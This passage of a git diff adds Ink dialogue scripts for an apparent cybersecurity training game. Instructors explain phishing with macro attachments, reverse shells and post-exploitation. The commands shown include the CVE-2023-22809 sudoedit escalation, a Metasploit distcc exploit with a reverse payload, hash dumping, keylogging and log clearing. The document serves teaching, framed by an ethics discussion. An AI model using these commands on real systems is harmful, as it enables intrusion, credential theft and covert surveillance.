**Phase 5 - Exploitation**: +- Victim opens attachment, payload executes +- Reverse shell connects to your listener +- You gain remote access + +Social Engineering Specialist: **Phase 6 - Objective**: +- Navigate filesystem: `ls -la`, `cd /home/victim` +- Read flag files: `cat flag` +- Submit flags to prove success + ++ [Back to main menu] + -> social_engineering_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +~ instructor_rapport += 5 + +Social Engineering Specialist: Practical tips for the simulation: + +Social Engineering Specialist: **Reconnaissance tips**: +- Explore every page on accountingnow.com +- Note employee roles—finance, management, IT, etc. +- Look for names mentioned in multiple places (relationships) + +Social Engineering Specialist: **Email crafting tips**: +- Pay attention to victim feedback—they tell you what's wrong +- Use names (theirs and colleagues') in messages +- Spoof sender to someone they'd trust +- Create urgency or authority without being obvious + +Social Engineering Specialist: **Technical tips**: +- Start netcat listener BEFORE sending email +- For macros: ensure victim's security is set to allow execution +- Be patient—LibreOffice can take 1-2 minutes to launch +- If connection fails, check IP addresses and ports + +Social Engineering Specialist: **Payload selection**: +- Finance/accounting: spreadsheets (.ods with macros) +- Management: documents (.odt with macros) +- Technical roles: might accept executables +- Experiment if initial attachment type fails + +Social Engineering Specialist: **Shell usage**: +- Simple commands only in basic reverse shells +- `ls -la` to list files +- `cat filename` to read files +- `pwd` to check location +- Flags are in victim home directories + +Social Engineering Specialist: **Troubleshooting**: +- No connection? Verify listener running and victim opened file +- No victim response? 
Check email content against feedback +- Permission denied? You're limited to victim's user permissions + ++ [Back to main menu] + -> social_engineering_hub + +// =========================================== +// ETHICS DISCUSSION +// =========================================== + +=== ethics_discussion === +~ ethics_discussed = true +~ instructor_rapport += 10 + +Social Engineering Specialist: Critical topic. Ethical considerations. + +Social Engineering Specialist: The techniques you're learning are powerful and potentially harmful. Let's be absolutely clear about ethical boundaries: + +Social Engineering Specialist: **Authorized testing only**: Everything we've covered is for authorized penetration testing within controlled environments. Using these techniques against systems you don't have explicit written permission to test is illegal—computer fraud, unauthorized access, potential felony charges. + +Social Engineering Specialist: **Simulation vs reality**: This lab is a controlled simulation. Victims are non-existent. In real penetration tests, you're testing real employees with real systems, under contract, with defined scope. + +Social Engineering Specialist: **Defensive purpose**: You're learning these techniques to: +- Conduct authorized security assessments +- Understand attacker methods to build defenses +- Train others in recognizing social engineering +- Improve organizational security posture + +Social Engineering Specialist: **Professional responsibility**: Security professionals must operate ethically. Our field requires trust. Abuse these skills and you damage the entire profession. + +* [What about "ethical hacking" justifications?] + ~ ethical_awareness_shown = true + You: I've heard people justify unauthorized testing as "ethical hacking" to help organizations. + -> ethical_hacking_discussion +* [How do legitimate penetration tests work?] + You: How does authorized testing differ from what we're practicing? 
+ -> pentest_process +* [I understand the ethical boundaries] + ~ ethical_awareness_shown = true + You: Clear on the ethics. Authorized testing, defensive purpose, professional responsibility. + Social Engineering Specialist: Excellent. Remember that throughout your career. + ~ instructor_rapport += 15 + -> social_engineering_hub + +=== ethical_hacking_discussion === +~ instructor_rapport += 15 + +Social Engineering Specialist: "Ethical hacking" without authorization is a contradiction. + +Social Engineering Specialist: Some people justify unauthorized penetration testing as "helping" organizations by exposing vulnerabilities. This is wrong on multiple levels: + +Social Engineering Specialist: **Legally**: Unauthorized access is illegal, regardless of intent. "I was trying to help" is not a legal defense. You can be prosecuted. + +Social Engineering Specialist: **Ethically**: You're making decisions about acceptable risk for someone else's systems without their consent. Not your choice to make. + +Social Engineering Specialist: **Practically**: Penetration testing can cause disruptions, trigger incident responses, waste security team resources. Unauthorized testing creates real costs. + +Social Engineering Specialist: **Professionally**: It demonstrates poor judgment and lack of integrity. Organizations won't hire security professionals who've demonstrated willingness to break rules. + +Social Engineering Specialist: **Proper approach**: If you identify a vulnerability, responsible disclosure. Report it to the organization through appropriate channels (security contact, bug bounty program). Let them decide how to handle it. + +Social Engineering Specialist: The distinction is consent. Authorized testing with consent is ethical. Unauthorized testing without consent is not—even with "good intentions." 
+ +~ instructor_rapport += 20 +-> social_engineering_hub + +=== pentest_process === +~ instructor_rapport += 15 + +Social Engineering Specialist: Legitimate penetration testing process: + +Social Engineering Specialist: **Engagement and contracting**: +- Client requests penetration test +- Scope is defined: which systems, which methods, what's off-limits +- Contract specifies deliverables, timeline, liability +- Written authorization provided +- Emergency contacts established + +Social Engineering Specialist: **Rules of engagement**: +- Testing windows (when testing is permitted) +- Prohibited actions (don't DOS production systems, don't access sensitive data types) +- Notification procedures (how to report critical findings immediately) +- Legal protections and authorizations + +Social Engineering Specialist: **Execution**: +- Testing conducted within agreed scope +- Documentation of all actions +- Communication with client contact +- Immediate reporting of critical vulnerabilities + +Social Engineering Specialist: **Reporting**: +- Comprehensive report of findings +- Risk ratings and remediation recommendations +- Executive summary for leadership +- Technical details for security teams +- Retest to verify fixes + +Social Engineering Specialist: This structured, authorized, documented process is what makes penetration testing ethical and legal. Everything else is unauthorized hacking. + +~ instructor_rapport += 15 +-> social_engineering_hub + +// =========================================== +// READY FOR SIMULATION +// =========================================== + +=== ready_for_simulation === + +Social Engineering Specialist: Good. Let's review readiness: + +{reconnaissance_discussed and phishing_basics_discussed and malicious_attachments_discussed: + Social Engineering Specialist: You've covered the core material. You understand reconnaissance, phishing tactics, and payload creation. 
+- else: + Social Engineering Specialist: You might want to review topics you haven't covered. But you've got enough to attempt the simulation. +} + +{ethics_discussed or ethical_awareness_shown: + Social Engineering Specialist: And you're clear on ethical boundaries. That's critical. +- else: + Social Engineering Specialist: Before you start—review the ethics discussion. Understanding legal and ethical constraints is non-negotiable. +} + +Social Engineering Specialist: Simulation objectives: +1. Reconnaissance on accountingnow.com—identify targets +2. Set up netcat listener for reverse shells +3. Create malicious attachments (macros or executables) +4. Craft convincing phishing emails +5. Spoof sender addresses for credibility +6. Send targeted emails to employees +7. Gain remote access when victims open attachments +8. Read flag files from victim home directories + +Social Engineering Specialist: Remember: in the simulation, victims provide feedback. They'll tell you why they don't trust your emails. Use that intelligence to refine your approach. + +Social Engineering Specialist: This is iterative social engineering. First attempt might fail. Adjust and try again. That's realistic—real attackers iterate too. + +{instructor_rapport >= 60: + Social Engineering Specialist: You've demonstrated strong understanding and good ethical awareness. You're well-prepared for this exercise. +} + +Social Engineering Specialist: Final reminder: these are authorized simulations for defensive learning. Good luck, Agent {player_name}. + +-> end_session + +// =========================================== +// END SESSION +// =========================================== + +=== end_session === + +Social Engineering Specialist: Whenever you need guidance on social engineering techniques or ethical considerations, I'm available. + +{ethical_awareness_shown: + Social Engineering Specialist: I'm confident you'll use these skills responsibly. You've demonstrated solid ethical judgment. 
+} + +Social Engineering Specialist: Social engineering exploits human nature. Understanding these attacks makes you a better defender—and a more effective penetration tester within authorized engagements. + +Social Engineering Specialist: Now demonstrate what you've learned. And remember: authorized testing only. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/post_exploitation.ink b/story_design/ink/game_scenarios/post_exploitation.ink new file mode 100644 index 0000000..93b1fa1 --- /dev/null +++ b/story_design/ink/game_scenarios/post_exploitation.ink 
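Review bot: The `instructor_rapport` bookkeeping in `ethics_discussion` and `ethical_hacking_discussion` is hard to reason about: entering `ethics_discussion` adds 10, the "I understand" branch adds 15 more, and `ethical_hacking_discussion` adds 15 on entry plus 20 at its end, while `ready_for_simulation` gates a line on `instructor_rapport >= 60`; a short comment stating the intended maximum and the 60 threshold (or a single award per knot) would make that gate verifiable. Minor wording in `pentest_process`: "don't DOS production systems" should read "don't DoS production systems", and "Victims are non-existent" sits oddly beside "in the simulation, victims provide feedback"; "Victims are simulated" says what is meant.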
@@ -0,0 +1,906 @@ +// Post-exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR post_exploit_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. + +~ instructor_rapport = 0 +~ post_exploit_mastery = 0 + +Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. + +Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. + +Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. + +Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. + +~ post_exploit_mastery += 10 + +-> post_exploit_hub + +=== post_exploit_hub === +Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? + ++ [What is post-exploitation?] 
+ -> post_exploit_intro ++ [Understanding shell access] + -> shell_access ++ [Assessing your level of access] + -> assessing_access ++ [Post-exploitation information gathering] + -> info_gathering ++ [Privilege escalation techniques] + -> privilege_escalation ++ [Using the sudo vulnerability (CVE-2023-22809)] + -> sudo_vulnerability ++ [Metasploit post-exploitation modules] + -> msf_post_modules ++ [Introduction to Meterpreter] + -> meterpreter_intro ++ [Meterpreter spyware features] + -> meterpreter_spyware ++ [Pivoting and port forwarding] + -> pivoting ++ [Maintaining access and covering tracks] + -> persistence_evasion ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== post_exploit_intro === +Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. + +Advanced Tactics Instructor: From there, you need to: +understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + ++ [Why not just stop after getting shell access?] + Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + + Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + + Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. 
+ + Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + + ~ instructor_rapport += 5 + ++ [What determines what you can do post-exploitation?] + Advanced Tactics Instructor: Several factors determine your capabilities: + + Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + + Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + + Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + + Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== shell_access === +Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. + +Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + ++ [What can I do with shell access?] + Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + + Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + + Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + + Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + + ~ instructor_rapport += 5 + ++ [What commands should I avoid?] 
+ Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + + Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + + Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + + Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + + ~ instructor_rapport += 5 + ++ [What's the difference between shells on Windows and Linux?] + Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + + Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + + Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + + Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== assessing_access === +Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. + +Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + ++ [How do I check my access level on Linux?] + Advanced Tactics Instructor: Use these commands to assess your Linux access: + + Advanced Tactics Instructor: whoami - Shows your username + + Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + + Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! 
+ + Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + + ~ instructor_rapport += 5 + ++ [How do I check my access level on Windows?] + Advanced Tactics Instructor: On Windows, you can use: + + Advanced Tactics Instructor: whoami - Shows your username and domain + + Advanced Tactics Instructor: whoami /priv - Shows your privileges + + Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + + Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. + + ~ instructor_rapport += 5 + ++ [What if I don't have root or Administrator access?] + Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + + Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + + Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + + Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + + Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== info_gathering === +Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + ++ [What system information should I gather on Linux?] 
+ Advanced Tactics Instructor: Key commands for Linux information gathering: + + Advanced Tactics Instructor: uname -a (kernel version and architecture) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + + Advanced Tactics Instructor: free -h (memory usage) + + Advanced Tactics Instructor: df -h (disk usage and partitions) + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + + Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + + ~ instructor_rapport += 5 + ++ [Why check the sudo version?] + Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + + Advanced Tactics Instructor: Check the version with: sudo --version + + Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + + Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + + Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. + + ~ instructor_rapport += 5 + ++ [What network information is useful?] + Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + + Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + + Advanced Tactics Instructor: route or ip route (routing table) + + Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + + Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. 
+ + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== privilege_escalation === +Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. + +Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + ++ [What are common privilege escalation vectors?] + Advanced Tactics Instructor: Common privilege escalation opportunities include: + + Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + + Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + + Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + + Advanced Tactics Instructor: Weak file permissions on sensitive files + + Advanced Tactics Instructor: Scheduled tasks running as administrators + + Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + + ~ instructor_rapport += 5 + ++ [How do I find privilege escalation opportunities?] 
+ Advanced Tactics Instructor: Systematic enumeration is key: + + Advanced Tactics Instructor: Check kernel and software versions against CVE databases + + Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + + Advanced Tactics Instructor: Check sudo permissions: sudo -l + + Advanced Tactics Instructor: Look for world-writable files in sensitive directories + + Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + + ~ instructor_rapport += 5 + ++ [Tell me about the sudo vulnerability] + -> sudo_vulnerability + +- -> post_exploit_hub + +=== sudo_vulnerability === +Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. + +Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + ++ [How does this vulnerability work?] + Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + + Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + + Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + + Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. + + ~ instructor_rapport += 5 + ++ [How can I use this to escalate privileges?] 
+ Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + + Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + + Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + + Advanced Tactics Instructor: Now you're root! + + ~ instructor_rapport += 5 + ++ [What's tricky about exploiting this?] + Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + + Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + + Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: +"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. + + Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== msf_post_modules === +Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. + +Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + ++ [How do I use post-exploitation modules?] + Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. 
+ + Advanced Tactics Instructor: Check your session ID: sessions + + Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + + Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + + Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + + Advanced Tactics Instructor: Run the module: exploit (or run) + + ~ instructor_rapport += 5 + ++ [What useful post-exploitation modules exist?] + Advanced Tactics Instructor: For Linux targets, valuable modules include: + + Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + + Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + + Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + + Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + + Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + + Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + + ~ instructor_rapport += 5 + ++ [Where does collected information get stored?] + Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + + Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + + Advanced Tactics Instructor: You can view loot with: loot + + Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_intro === +Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. 
+ +Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + ++ [What makes Meterpreter special?] + Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + + Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + + Advanced Tactics Instructor: Encrypted communications by default + + Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + + Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + + Advanced Tactics Instructor: Extensible with post-exploitation modules + + Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + + ~ instructor_rapport += 5 + ++ [How do I use Meterpreter commands?] + Advanced Tactics Instructor: Start by viewing available commands: help + + Advanced Tactics Instructor: Get current privileges: getuid and getprivs + + Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + + Advanced Tactics Instructor: Download files: download /path/to/file + + Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + + Advanced Tactics Instructor: View processes: ps + + Advanced Tactics Instructor: Migrate to another process: migrate PID + + Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [How does Meterpreter avoid detection?] 
+ Advanced Tactics Instructor: Meterpreter is designed for stealth: + + Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + + Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + + Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + + Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + + Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_spyware === +Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. + +Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + ++ [How does keylogging work in Meterpreter?] + Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + + Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + + Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + + Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + + ~ instructor_rapport += 5 + ++ [How do I capture screenshots?] 
+ Advanced Tactics Instructor: Screenshots show what the user is viewing: + + Advanced Tactics Instructor: screenshot - Captures current screen + + Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + + Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + + Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + + ~ instructor_rapport += 5 + ++ [Can I get full graphical control?] + Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + + Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + + Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + + Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + + Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== pivoting === +Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. + +Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + ++ [Why would I need to pivot?] 
+ Advanced Tactics Instructor: Several scenarios require pivoting: + + Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + + Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + + Advanced Tactics Instructor: Moving laterally through a corporate network + + Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + + Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + + ~ instructor_rapport += 5 + ++ [How does Meterpreter pivoting work?] + Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + + Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + + Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + + Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + + ~ instructor_rapport += 5 + ++ [What's port forwarding?] + Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + + Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + + Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + + Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. 
+ + Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== persistence_evasion === +Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. + +Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. + ++ [How do attackers maintain access?] + Advanced Tactics Instructor: Common persistence mechanisms include: + + Advanced Tactics Instructor: Creating new user accounts with administrative privileges + + Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + + Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + + Advanced Tactics Instructor: Installing rootkits that hide processes and files + + Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. + + ~ instructor_rapport += 5 + ++ [How do you cover your tracks?] + Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + + Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + + Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + + Advanced Tactics Instructor: Removing uploaded tools and malware + + Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + + Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + + ~ instructor_rapport += 5 + ++ [Does Meterpreter have anti-forensics features?] 
+ Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + + Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + + Advanced Tactics Instructor: It can migrate between processes, making it hard to find + + Advanced Tactics Instructor: Communications are encrypted + + Advanced Tactics Instructor: There are modules to clear event logs: clearev + + Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== commands_reference === +Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** + +Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) + +Advanced Tactics Instructor: msfconsole + +Advanced Tactics Instructor: search distccd + +Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec + +Advanced Tactics Instructor: set RHOST TARGET_IP + +Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse + +Advanced Tactics Instructor: set LHOST YOUR_IP + +Advanced Tactics Instructor: exploit + ++ [Show me access assessment commands] + Advanced Tactics Instructor: **Assessing Access Level:** + + Advanced Tactics Instructor: whoami (show username) + + Advanced Tactics Instructor: id (show UID, GID, groups) + + Advanced Tactics Instructor: id -u (show just UID - 0 means root) + + Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + + ~ instructor_rapport += 3 + ++ [Show me information gathering commands] + Advanced Tactics Instructor: **Information Gathering (Linux):** + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: uname -a (kernel version) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + + Advanced Tactics Instructor: 
